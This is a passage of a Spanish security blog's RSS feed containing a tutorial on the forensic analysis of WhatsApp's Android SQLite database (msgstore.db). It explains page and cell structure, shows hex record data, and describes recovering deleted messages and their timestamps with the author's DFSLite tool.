large;&quot;&gt;DFTime Tools&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Se puede descargar la herramienta desde el repositorio oficial de ST2Labs (https://github.com/ST2Labs/DFIR/tree/master/SQLite)&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;#ST2Labs&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;#GEOSystemSoftware&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;www.st2labs.com | www.seguridadparatodos.es&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;PD: El análisis de las freelist page os lo dejo como &quot;trabajo&quot; para casa. :) Al igual que realizar un análisis manual de los freeblock.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/12/digital-forensics-of-android-whatsapp.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-xCe-a_HSges/Vl7q2F0d9vI/AAAAAAAAd0c/bvksOH9iFLY/s72-c/Whatsapp_p3_st2labs.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-8237155665178581568</guid><pubDate>Wed, 02 Dec 2015 17:00:00 +0000</pubDate><atom:updated>2015-12-02T18:00:06.647+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">database</category><category domain="http://www.blogger.com/atom/ns#">DFIR</category><category domain="http://www.blogger.com/atom/ns#">dfsqlite2</category><category domain="http://www.blogger.com/atom/ns#">Forensics</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Moviles</category><category domain="http://www.blogger.com/atom/ns#">sqlite</category><category domain="http://www.blogger.com/atom/ns#">Whatsapp</category><title>Digital Forensics of Android WhatsApp SQLite Database (Part II)</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-S1ktBsgfK40/Vl7qsT4jrAI/AAAAAAAAd0U/m0XGeVoHdqg/s1600/Whatsapp_p2_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;352&quot; src=&quot;http://2.bp.blogspot.com/-S1ktBsgfK40/Vl7qsT4jrAI/AAAAAAAAd0U/m0XGeVoHdqg/s640/Whatsapp_p2_st2labs.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;En esta segunda parte, se procederá a recuperar &lt;b&gt;un mensaje que ha sido eliminado&lt;/b&gt; en la base de datos SQLite de la aplicación WhatsApp y se analizará la información obtenida para determinar cuando se envío el mensaje (timestamp) recuperado.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Estructura de SQLite (II)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Una vez que conocemos el esquema de la base de datos, y como se organiza la información útil (payload data) dentro de las celdas de cada una de las páginas, es conveniente conocer el formato completo del fichero SQLite (&lt;a href=&quot;http://www.sqlite.org/fileformat.html#varint_format&quot; target=&quot;_blank&quot;&gt;file format&lt;/a&gt;) para navegar en el fichero de forma adecuada.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Lo primero que se necesita es conocer el tamaño de las páginas y el número total de páginas que contiene la base de datos, esta información se encuentra dentro de la cabecera de la base de datos (database header).&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Analizando la base de datos del ejemplo (msgstore.db) y utilizando mi propia herramienta&amp;nbsp;&lt;b&gt;DFSLite (Digital Forensics SQlite Tools) &lt;/b&gt;desarrollada para la ocasión, se obtiene que:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-gOadtD3f9ZY/Vl67LFtB8zI/AAAAAAAAdxc/Ql-D7uFjtXo/s1600/SQLite_Header_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;http://1.bp.blogspot.com/-gOadtD3f9ZY/Vl67LFtB8zI/AAAAAAAAdxc/Ql-D7uFjtXo/s640/SQLite_Header_st2labs.png&quot; width=&quot;504&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 4 - SQLite Database Header Info&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Como se observa en la imagen anterior, se tiene que:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Page_size = 4096&lt;/li&gt;&lt;li&gt;Num_page = 27&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;La base de datos en el momento del análisis tiene un máximo de 27 páginas, como cada página tiene un tamaño especifico, se puede calcular el Offset de acceso al fichero para cada una de las páginas utilizando la siguiente formula:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;Offset (pagina N) = (N -1) * Page_size&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Se debe de tener en cuenta que las páginas se numeran desde 1 hasta N, y que el Offset para la primera página es 0.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Cada página dentro de la base de datos (excepto la primera página) guardan el siguiente formato:&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-NDF58HUHV8c/Vl65rcY3YNI/AAAAAAAAdxQ/ZWnuIwmWQwI/s1600/sqlite_page_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://4.bp.blogspot.com/-NDF58HUHV8c/Vl65rcY3YNI/AAAAAAAAdxQ/ZWnuIwmWQwI/s320/sqlite_page_st2labs.png&quot; width=&quot;233&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;font-size: 12.8px;&quot;&gt;ST2Labs 5 - SQLite Page Format&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Las celdas (registros) de la base de datos se rellenan desde el final de la página hacia el inicio, con objeto de permitir que el Cell Pointer Array aumente según se agregan registros a la página.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Analizando el contenido del &quot;Cell Pointer Array&quot; se obtienen el número de celdas que contiene la página y el offset relativo a la página donde comienzan. Con &lt;b&gt;DFSLite &lt;/b&gt;se puede obtener un listado con todos los Cell Pointer Array e información sobre los registros que existen en cada una de las páginas de la base de datos de la siguiente forma:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;float: left; margin-right: 1em; text-align: left;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-mvoeGY1MiVU/Vl6_YpMEzBI/AAAAAAAAdx4/XQ92yZQF1qo/s1600/sqlite_cell_pointer_array_whatsapp_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://2.bp.blogspot.com/-mvoeGY1MiVU/Vl6_YpMEzBI/AAAAAAAAdx4/XQ92yZQF1qo/s400/sqlite_cell_pointer_array_whatsapp_st2labs.png&quot; width=&quot;275&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 6 - SQLite Page Cell Pointer Array Info&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;float: left; margin-right: 1em; text-align: left;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-e22ZzMXnKis/Vl7AyQ_SDuI/AAAAAAAAdyE/z70aJ0K8IuE/s1600/sqlite_dfslite_cell_page_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://1.bp.blogspot.com/-e22ZzMXnKis/Vl7AyQ_SDuI/AAAAAAAAdyE/z70aJ0K8IuE/s400/sqlite_dfslite_cell_page_st2labs.png&quot; width=&quot;275&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2labs 7 - SQLite All Cell for Page List&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Esta información es útil para identificar rápidamente que páginas tienen registros (celdas) de información y cuales no. Además de obtener el Offset absoluto y el número total de registros que hay dentro de la base de datos en cada página.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Toda esta información es interesante desde el punto de vista Forense, para centrar el análisis en aquellas páginas que no tengan registros (mayor espacio sin utilizar), en busca de posible información eliminada y que se encuentre almacenada.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;Esto es posible, dado que como si de un sistema de ficheros se tratase cuando se elimina información de la base de datos, esta no se &quot;borra&quot; físicamente (no se sobrescribe de forma inmediata) simplemente se elimina el indice de localización de la información en la base de datos, y se queda residente en el fichero hasta que ésta sea sobrescrita posteriormente con otra información.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Por ello, el periodo de &lt;b&gt;tiempo desde que un registro fue eliminado hasta que se analiza de forma forense es crucial para recuperar la mayor cantidad de información&lt;/b&gt;, influyendo directamente el nivel de intensidad de uso de la aplicación en ese tiempo con la capacidad de recuperación de información útil.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Hasta aquí la introducción resumida del formato SQLite, se puede profundizar más en el formato consultando la documentación oficial en el siguiente &lt;a href=&quot;http://www.sqlite.org/fileformat.html#varint_format&quot; target=&quot;_blank&quot;&gt;enlace&lt;/a&gt;.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;A continuación vamos directos a analizar la estructura de la tabla &quot;Messages&quot; de la aplicación WhatsApp dentro de la base de datos SQLite.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Estructura base datos Whatsapp&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Tal y como se comprobó en el&amp;nbsp;&lt;a href=&quot;http://www.seguridadparatodos.es/2015/11/digital-forensics-of-android-whatsapp.html&quot; target=&quot;_blank&quot;&gt;primer articul&lt;/a&gt;o, con ayuda de la herramienta &lt;a href=&quot;https://github.com/ST2Labs/DFIR/tree/master/SQLite&quot; target=&quot;_blank&quot;&gt;sqlite_ex&lt;/a&gt;, se averigua que&amp;nbsp;la tabla &quot;messages&quot; de WhatsApp se encuentra almacenada en la página 3 de la base de datos SQLite (msgstore.db).&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Con ayuda de un editor hexadecimal, abrimos la base de datos y nos dirigimos al Offset = 8192 correspondiente a la página 3 (véase la formula comentada anteriormente para el cálculo). Para localizar rápidamente los registros dentro de la página, me apoyo en la DFSLite con la opción -p 3, para analizar la estructura del CellPointerArray de la página, tal que así:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-9eSOnpK5k-c/Vl7GE_orqFI/AAAAAAAAdyU/BFy9SeIO64w/s1600/p3_Cell_Pointer_Array_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-9eSOnpK5k-c/Vl7GE_orqFI/AAAAAAAAdyU/BFy9SeIO64w/s1600/p3_Cell_Pointer_Array_st2labs.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 9 - Cell Pointer Array Info Page 3&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;El CellPointer Array se encuentra en el Offset: 8200, se realiza un Decode de &quot;Data&quot; y se obtiene el total de Offset relativos a la página donde se encuentran los registros válidos (existentes) dentro de la base de datos:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Decode Cell Pointer Array Data:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp; - &amp;nbsp;Offsets: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; [4048, 3390, 3269, 3166]&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Con el Offset relativo a la página 3, se puede calcular el Offset de cada una de los registros válidos de la base de datos (msgstore.db).&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;por ejemplo: Cell Offset 3166 se corresponde con el Offset absoluto: 11358, se abre la base de datos con un editor hexadecimal y se obtiene:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-4xdKpgdiI8s/Vl7LF4pIz0I/AAAAAAAAdyk/n_TxRXYHTgI/s1600/hex_data_cell_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;152&quot; src=&quot;http://4.bp.blogspot.com/-4xdKpgdiI8s/Vl7LF4pIz0I/AAAAAAAAdyk/n_TxRXYHTgI/s640/hex_data_cell_st2labs.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 10 - Hexa Cell Data Offset 11358&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;La estructura de un registro (celda) de información de tipo Table, de una base de datos SQLite tiene la siguiente estructura:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-h8Y_jKdpgPo/Vl679oY_TXI/AAAAAAAAdxk/nunxfYpwHdg/s1600/sqlite_database_Cell_struct_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;178&quot; src=&quot;http://2.bp.blogspot.com/-h8Y_jKdpgPo/Vl679oY_TXI/AAAAAAAAdxk/nunxfYpwHdg/s640/sqlite_database_Cell_struct_st2labs.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;font-size: 12.8px;&quot;&gt;ST2Labs 8 - Sqlite Cell File Format&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Para calcular el tamaño de la celda, y el tamaño del payload la base de datos SQLite utiliza el tipo VarInt, que consiste en el algoritmo de codificación estático de Huffman de 64 bits, que permite codificar en un máximo de 9 bytes el tamaño de la celda y/o el payload data.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;** Para este artículo, no se va a explicar como decodificar los tipo de datos VarInt.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Analizando la Información&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Un registro (cell) dentro de la página 3 de la base de datos SQLite (msgstore.db) de la aplicación WhatsApp almacenará la información de la siguiente forma:&lt;/div&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-Wv7Cc13xHqo/Vl62i8cCHqI/AAAAAAAAdxE/c31BgI5TvH4/s1600/sqlite_cell_whatsapp_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;484&quot; src=&quot;http://3.bp.blogspot.com/-Wv7Cc13xHqo/Vl62i8cCHqI/AAAAAAAAdxE/c31BgI5TvH4/s640/sqlite_cell_whatsapp_st2labs.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot;&gt;ST2Labs 11 - WhatsApp Cell Payload Data SQLite Struct&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;La información se almacena dentro de una &quot;celda&quot; de la base de datos SQLite de forma continua, la imagen 4 representa &quot;payload data&quot;, por tanto lo más interesante es saber que&amp;nbsp;después&amp;nbsp;del mensaje &quot;Data&quot; a&amp;nbsp;continuación le sigue el timestamp.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Analizando la información de la imagen 10, se puede observar que se tiene el &lt;b&gt;Key_remote_jid | key_from_me |&amp;nbsp;key_id | status | data | timestamp&lt;/b&gt;. Se ha escogido un registro &quot;no borrado&quot; de la base de datos para analizar, de forma que se pueda&amp;nbsp;contrastar&amp;nbsp;la información resultante.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Con ayuda de DFSLite, se puede extraer la información para el registro 11358 de la página 3, donde se resumen de la forma siguiente:&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;** Page 3 &amp;nbsp; &amp;nbsp; - Cell Data 1/4 Offset 11358&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&amp;nbsp; - &amp;nbsp;RowID: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 8&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&amp;nbsp; - &amp;nbsp;Size: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;101&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&amp;nbsp; - &amp;nbsp;Header: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;32&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&amp;nbsp; - &amp;nbsp;Data:&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;20004108270808290500000f0800000008080808000d0501010100000008&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;0000333436373432353639313540732e77686174736170702e6e65745557&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;6870734b34507765664330546f646f20656e206f7264656e210151245e46a&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;8300151245cfd47ffffff&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Cada uno de los campos de la base de datos se codifica según lo que en SQLite se conoce como&amp;nbsp;&lt;i style=&quot;font-weight: bold;&quot;&gt;&quot;Serial Type Codes Of The Record Format&quot;&lt;/i&gt;, como ya podéis imaginar con DFSLite he decodificado la información del PAYLOAD HEADER y se obtiene el tipo de cada uno de los campos de la base de datos y el tamaño, para el caso aquí se analiza, el timestamp es tipo Integer (48bits) ~ 6 